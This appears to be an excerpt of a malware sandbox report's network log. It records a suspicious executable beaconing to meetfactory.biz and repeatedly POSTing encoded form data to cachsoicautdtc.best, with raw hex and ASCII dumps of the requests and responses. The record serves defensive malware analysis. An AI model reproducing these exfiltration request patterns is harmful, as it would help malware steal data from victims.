                                                                                                                                                                                                                                                              Data Ascii: 264SMs0WPvH'1C$u%#$&tKu@eYo/%"lR1Ihl A[~XNz?D]/=FX g:wzicGPR$pA!'2*(zuE*"|n6xSgveYc,<p-J?XaDVQ%qql,{ZgwBFAA9:P7%f!^*'Ja=iRlI>u$e6?yNi62'n2W3/tA/g`\j`5Nik1V7\Qz?lqq>jdm#xuA)rzdmL4sOZux5 7*B:>K/_'P Bg9"_'w8&u3fcz,{-&WaeD0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.11.204974872.14.178.17480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.385818958 CEST552OUTGET /o0e7/?9B6h=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.519345999 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:29 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 34 39 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6d 65 65 74 66 61 63 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 49C<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728473789.0071446818&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICI5QjZoPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZGbFM9M2xkSDVka0gtZEJMZiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsa [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.519380093 CEST59INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: } </script> </body></html>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.11.2049750172.67.191.24180900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.628859043 CEST832OUTPOST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 5a 4c 47 52 55 37 41 54 33 49 73 59 75 2b 66 74 77 56 57 75 6c 52 57 61 46 62 47 4e 33 42 6b 63 4d 6d 47 30 32 30 39 4a 2f 37 79 4e 57 37 46 6f 58 4e 42 56 36 51 30 6d 4c 39 57 67 64 77 2b 56 4c 33 32 65 49 4d 71 48 38 4b 72 38 4e 65 65 31 58 48 59 32 4a 6d 79 67 6c 32 59 43 4f 50 4a 76 63 7a 71 72 6f 76 71 64 44 6d 5a 73 35 56 61 6d 4e 31 38 45 39 39 51 34 37 55 48 44 56 72 4b 44 53 4d 5a 49 31 55 51 58 63 50 6b 72 52 74 58 6a 66 2b 51 42 65 6b 44 75 71 71 6a 58 46 42 62 4b 2b 43 61 32 36 39 6b 52 45 65 30 53 4c 45 41 4d 49 45 43 45 36 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.736970901 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:22 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQ1vhDzew5KD6KeLZgP%2FG6T0kV48G3oEB7pjCulSitPF6RWxI2wQNy%2BtwDSGu49GIMccWGZHiiaCBveFsXG8HreVAhw28JOSQYLCWUmfEtuNxpG87QJ2%2BjDXqmBcZWbkr7KkKCdSX0RFjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1525fe470cc8-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 36 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f db 38 12 fd df 9f 62 a2 03 12 1b b0 24 bb db 6e 53 47 d6 61 af cd 01 01 7a d8 ee 36 c5 5d b1 28 02 8a 1c 59 dc 50 a4 8e a4 ac 18 b9 7c f7 05 45 c9 96 7f 24 7b c5 1d 10 20 a2 38 7c 33 f3 f8 66 44 3a 39 fb f0 f3 fb db af 9f ae a1 b0 a5 48 47 c9 59 18 fe c6 73 10 16 6e ae e1 ed b7 14 12 37 01 54 10 63 96 81 54 e1 ef 06 38 fe 08 4a 30 8e 01 08 22 57 cb 00 65 f8 e5 73 90 42 72 f6 1b 4a c6 f3 6f 61 b8 83 ea 70 00 4e 43 bd fd 3e a8 cb 17 a0 2e bf 03 6a 65 3b 34 f7 e2 54 96 c7 28 61 b8 8f 54 20 61 e9 28 b1 dc 0a 4c 7f b2 16 a5 e5 4a c2 af f8 ef 9a 6b 64 67 f0 1f 78 2f 54 cd 72 41 34 26 b1 b7 1b 25 25 5a 02 b4 20 da a0 5d 06 5f 6e ff 1e 5e 06 10 f7 13 85 b5 55 e8 10 d6 cb e0 bd 92 0e 34 bc dd 54 18 00 f5 a3 65 60 f1 c1 c6 2e de ab 2d cc 4b 28 ff 0a bf fc 14 be 57 65 45 2c cf c4 10 e8 e6 7a 79 cd 56 38 58 27 49 89 cb 40 ab 4c 59 33 30 94 8a 4b 86 0f 53 90 2a 57 42 a8 e6 68 c9 9a 63 53 29 6d 07 8b 1a ce 6c b1 64 b8 e6 14 c3 76 30 e5 92 5b 4e 44 68 28 11 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 6ceXo8b$nSGaz6](YP|E${ 8|3fD:9HGYsn7TcT8J0"WesBrJoapNC>.je;4T(aT a(LJkdgx/TrA4&%%Z ]_n^U4Te`.-K(WeE,zyV8X'I@LY30KS*WBhcS)mldv0[NDh({=h@S 8[4BjL|xbG&jC>br^8bUEr=%(D|ipyea|&U:Js$&8r%pT(Gn,J?SGE)8j5XS.QhZ{/MHj{1V+6qS%\dBo4<
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737091064 CEST1172INData Raw: b8 4f ed a8 8a 46 a3 24 ee 0a c9 71 e7 92 4f 18 5f 77 fb 1f 36 9a 54 15 ea 20 6d e1 da 99 ae 48 69 ee 43 82 fe 21 6c 37 c8 0d bb 88 db 71 a7 a4 41 0e 01 30 62 49 68 35 91 46 10 8b ae c4 1d b1 77 de c8 04 e9 27 81 c4 20 f8 d7 5d a6 26 4a 62 c6 d7
                                                                                                                                                                                                                                                              Data Ascii: OF$qO_w6T mHiC!l7qA0bIh5Fw' ]&Jb8[/!CKp5no Tic?yFkuQ-wnz3 kQBk, Sg;TD=_VJ j Ug@-Yehld:m@u8Ae_;$$c@
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737102032 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.11.2049751172.67.191.24180900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.251105070 CEST852OUTPOST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 54 77 63 4d 44 69 30 33 31 39 4a 36 37 79 4e 65 62 46 68 4b 64 42 65 36 51 34 41 4c 39 71 67 64 77 71 56 4c 7a 2b 65 49 38 57 45 38 61 72 70 55 4f 65 33 4a 33 59 32 4a 6d 79 67 6c 31 6c 6e 4f 50 52 76 64 43 36 72 71 4c 2b 65 64 32 5a 76 70 31 61 6d 4a 31 38 49 39 39 51 61 37 56 62 70 56 70 79 44 53 4e 70 49 31 47 34 55 48 66 6b 68 65 4e 57 73 61 66 52 34 66 48 4c 63 6b 70 48 38 45 67 54 6c 32 30 4c 73 6e 50 51 31 48 4e 6f 67 50 30 35 6b 4b 47 44 66 6e 4c 42 7a 6a 4a 51 31 71 6b 41 43 47 41 47 73 33 58 6e 37 6c 77 67 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3TwcMDi0319J67yNebFhKdBe6Q4AL9qgdwqVLz+eI8WE8arpUOe3J3Y2Jmygl1lnOPRvdC6rqL+ed2Zvp1amJ18I99Qa7VbpVpyDSNpI1G4UHfkheNWsafR4fHLckpH8EgTl20LsnPQ1HNogP05kKGDfnLBzjJQ1qkACGAGs3Xn7lwg=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357562065 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:10 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:25 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BNOmL4dh5VPKKLEPtm8qWwHw8zZ%2F%2BIJBhOdT6QhMdtAwTvQh3B8EqFrPPBcC%2FOpKqQ7q3xqW%2Br9fTvWzxovW%2BxKQ0xhAKIC6NH6T74ap%2FvftFwbxDfDHsli%2FR2zjX1QND0XUDCWbnuCig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe15365e6d43be-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 a2 02 f6 2e 60 4a de bc 3a b6 56 c5 35 71 01 03 29 2e 77 71 d0 06 87 c0 a0 c8 d1 8a 67 8a 54 49 6a e5 85 eb ff 7e a0 28 ad b5 2f f6 35 68 01 03 16 c5 e1 33 33 0f 9f 19 91 9b be f8 f8 f3 87 eb 6f 9f 2f a1 74 95 cc 26 e9 0b 42 7e 13 05 48 07 57 97 f0 ee 7b 06 a9 9f 00 26 a9 b5 8b 48 69 f2 bb 05 81 6f 41 4b 2e 30 02 49 d5 72 11 a1 22 5f bf 44 19 a4 2f 7e 43 c5 45 f1 9d 90 47 a8 1e 07 e0 30 d4 bb 1f 83 3a 7b 06 ea ec 07 a0 96 ae 47 f3 2f 0e 65 b9 8f 42 c8 36 52 89 94 67 93 d4 09 27 31 fb c9 39 54 4e 68 05 bf e2 bf 1b 61 90 bf 80 ff c0 07 a9 1b 5e 48 6a 30 4d 82 dd 24 ad d0 51 60 25 35 16 dd 22 fa 7a fd 77 72 16 41 32 4c 94 ce d5 c4 23 ac 16 d1 07 ad 3c 28 b9 5e d7 18 01 0b a3 45 e4 f0 ce 25 3e de 8b 0d cc 73 28 ff 22 5f 7f 22 1f 74 55 53 27 72 39 06 ba ba 5c 5c f2 25 8e d6 29 5a e1 22 32 3a d7 ce 8e 0c 95 16 8a e3 dd 09 28 5d 68 29 75 bb b7 64 25 b0 ad b5 71 a3 45 ad e0 ae 5c 70 5c 09 86 a4 1b 9c 08 25 9c a0 92 58 46 25 2e e6 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 6cdXmob.`J:V5q).wqgTIj~(/5h33o/t&B~HW{&HioAK.0Ir"_D/~CEG0:{G/eB6Rg'19TNha^Hj0M$Q`%5"zwrA2L#<(^E%>s("_"tUS'r9\\%)Z"2:(]h)ud%qE\p\%XF%.Eu"n-.+n+4X,qER$a*aEhc(.]^:,|}_Q<?}HP6>iIj&EWbI61VD>/V(r~B>Pr>i@(s:XQ=p.%8*EzXwy\Z5,8
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357672930 CEST1179INData Raw: 87 d9 04 e0 61 92 26 43 6a 7b 55 34 99 a4 49 5f 48 9e 3b 9f 7c ca c5 aa df 7f d2 1a 5a d7 68 a2 ac 83 eb 66 fa 22 65 45 08 09 86 07 d2 6d 90 1f f6 11 77 e3 5e 49 a3 1c 22 e0 d4 51 e2 0c 55 56 52 87 be c4 3d b1 37 c1 c8 46 d9 67 89 d4 22 84 d7 7d
                                                                                                                                                                                                                                                              Data Ascii: a&Cj{U4I_H;|Zhf"eEmw^I"QUVR=7Fg"}6N.V8;/BD5^*^Y|/XQE>n+QAg<M( sQM7@B!QVZ-mw,4)_n$q+A+,XnLA
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357683897 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.11.2049752172.67.191.24180900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875029087 CEST1289OUTPOST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 53 49 63 50 77 61 30 33 57 6c 4a 35 37 79 4e 55 37 46 73 4b 64 42 35 36 55 55 45 4c 39 6d 57 64 79 53 56 4b 52 6d 65 4f 4f 79 45 7a 61 72 70 4a 65 65 30 58 48 59 76 4a 6d 69 73 6c 32 64 6e 4f 50 52 76 64 42 53 72 75 66 71 65 66 32 5a 73 35 56 61 71 4e 31 38 73 39 35 31 6c 37 56 76 54 57 59 53 44 53 75 52 49 32 7a 6b 55 4c 66 6b 6e 5a 4e 58 7a 61 61 4a 5a 66 48 6e 6d 6b 73 37 61 45 68 62 6c 31 69 47 30 31 63 34 4a 54 4c 38 77 4d 58 68 68 45 6e 62 34 74 4d 4e 2f 6e 62 51 4b 32 55 59 78 5a 42 47 2f 73 53 2f 52 6d 6e 4a 43 6c 4f 79 4c 6f 52 75 48 44 2f 50 6d 75 36 4b 59 33 46 71 35 68 32 79 57 57 6c 57 6e 36 55 55 57 63 6e 59 63 49 2b 71 70 38 46 56 33 50 74 6a 58 78 45 58 55 65 73 44 76 77 58 52 33 78 4a 71 43 48 56 77 6a 6a 50 48 62 2b 36 78 44 7a 56 35 74 41 4c 6d 39 48 42 74 32 4c 47 76 6c 32 42 54 56 79 49 54 48 46 4f 59 6e 79 4d 72 6d 42 43 76 33 6c 63 6d 6a 57 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3SIcPwa03WlJ57yNU7FsKdB56UUEL9mWdySVKRmeOOyEzarpJee0XHYvJmisl2dnOPRvdBSrufqef2Zs5VaqN18s951l7VvTWYSDSuRI2zkULfknZNXzaaJZfHnmks7aEhbl1iG01c4JTL8wMXhhEnb4tMN/nbQK2UYxZBG/sS/RmnJClOyLoRuHD/Pmu6KY3Fq5h2yWWlWn6UUWcnYcI+qp8FV3PtjXxEXUesDvwXR3xJqCHVwjjPHb+6xDzV5tALm9HBt2LGvl2BTVyITHFOYnyMrmBCv3lcmjWqMa8huBBHfcs1X23noBsD2SBRdFHO4MfNqaxaQ+gNX5pTMNxWrF+ex5Eh2AV9zFyLy2Gaywi9/4G6uKkPE7wuqBt1Xw7dfkA04FCtA1onI8KVyciE9CGjfyJHAIWVmBP/7wCF4JJeHyncfZgZXJdKa5nr0UrgAhMeqRWzPv3L5y+grdthjyRqpB2bl0ePg6ZnpsTIBLLn2YQGQMeBlYevZNW+3VWauXXXfGIxNAepqvhoF/9wexG1sbRJFadJ7LGdXN60/D26oN+UTov55MzscMtNsNeEGCF3mxb4/CTy/KFl4r9EXRyAXcjwiwg3si
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875077963 CEST1289OUTData Raw: 59 53 2f 4b 2f 6d 4f 37 48 47 49 52 49 66 2f 6b 4e 65 41 70 61 34 64 75 77 6c 4f 6a 76 73 49 32 48 6b 6b 6a 65 41 39 50 6a 6d 34 7a 67 34 49 43 6a 52 61 5a 55 48 35 50 33 72 65 4f 4b 79 6d 65 43 64 61 42 37 32 79 69 73 4b 75 7a 31 79 58 38 75 79
                                                                                                                                                                                                                                                              Data Ascii: YS/K/mO7HGIRIf/kNeApa4duwlOjvsI2HkkjeA9Pjm4zg4ICjRaZUH5P3reOKymeCdaB72yisKuz1yX8uynLJppY9d1ElDKL+3vf9zuEQXyoo7C7V13xYMC3YDm9Y8GXlDP00/leIIf7kXLPobp0JECdPuWVfECFd8IQHdARI6TrUWqXvfvH0pd6VO54lv5Ej15G84X19mEEJ4wAr1Etm5TTNmKvXLUdpWNHI6FSay5sGcLIqjR
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875128031 CEST5156OUTData Raw: 45 34 76 47 67 58 48 32 34 59 36 4b 6e 7a 49 32 65 4f 30 63 58 42 31 72 57 52 70 77 52 68 75 6b 65 50 71 54 68 4e 43 72 71 51 41 4b 64 6f 66 41 57 6f 4e 7a 4e 48 6c 55 73 68 32 59 47 62 69 6b 7a 6e 77 55 32 75 43 31 57 70 6d 47 37 2f 73 2b 4a 31
                                                                                                                                                                                                                                                              Data Ascii: E4vGgXH24Y6KnzI2eO0cXB1rWRpwRhukePqThNCrqQAKdofAWoNzNHlUsh2YGbikznwU2uC1WpmG7/s+J1Nsl6gZVY40DiRMh3+r8yRvHBJIC9KQLGrXgBYGzpniiCpjHp3l1Tsr/MULrsRN+jkoN70jFoyOwg4NuUsvmlD0a93XNPrn15G5qWaibbBY0JPEc5AKoZLmUyArGj90z3x1s7jslPk4wyGTzkOyJP8jmfOC2iRki2r
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875296116 CEST267OUTData Raw: 43 70 73 53 6b 67 58 43 68 7a 50 4f 41 6b 77 4d 47 79 59 57 52 2f 65 6c 72 69 4f 50 45 75 2b 67 56 47 63 62 5a 37 64 37 4a 38 31 79 76 2b 67 39 33 32 35 69 47 57 4e 45 57 4a 32 4a 37 41 75 77 77 48 47 6f 74 45 70 6b 2f 6b 36 42 73 4e 6b 38 4c 54
                                                                                                                                                                                                                                                              Data Ascii: CpsSkgXChzPOAkwMGyYWR/elriOPEu+gVGcbZ7d7J81yv+g9325iGWNEWJ2J7AuwwHGotEpk/k6BsNk8LTL5siCrXxbLRR6rdPOjCU1GMtu9Du3HfLqyxEiXKdfJqi7+onEpMCjSfcBSEfHiLM5I9EIuvXB9aQvDHJOnhLVluIljOY6VvXnVgZDEwFBWlLPdLFNoGL8WF74S/3ufjDZ5z1L31naDfQmVTlWxM8KME4546IWwU85
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983220100 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:12 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:27 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DuHcoaNo%2BJB1tgzo4wszli8GaECsSrCcjgovlkSpqgNx1%2BZgnlyT4%2BVPljDsUFJIjAstM3RW%2FM%2FBzIkMSosmHUsNtYvkISpqMgAVLbk4ANcwANU0FPGfzs1AYBAvBKe7lrsnvm0J%2Fm6MhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1546cf600f89-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
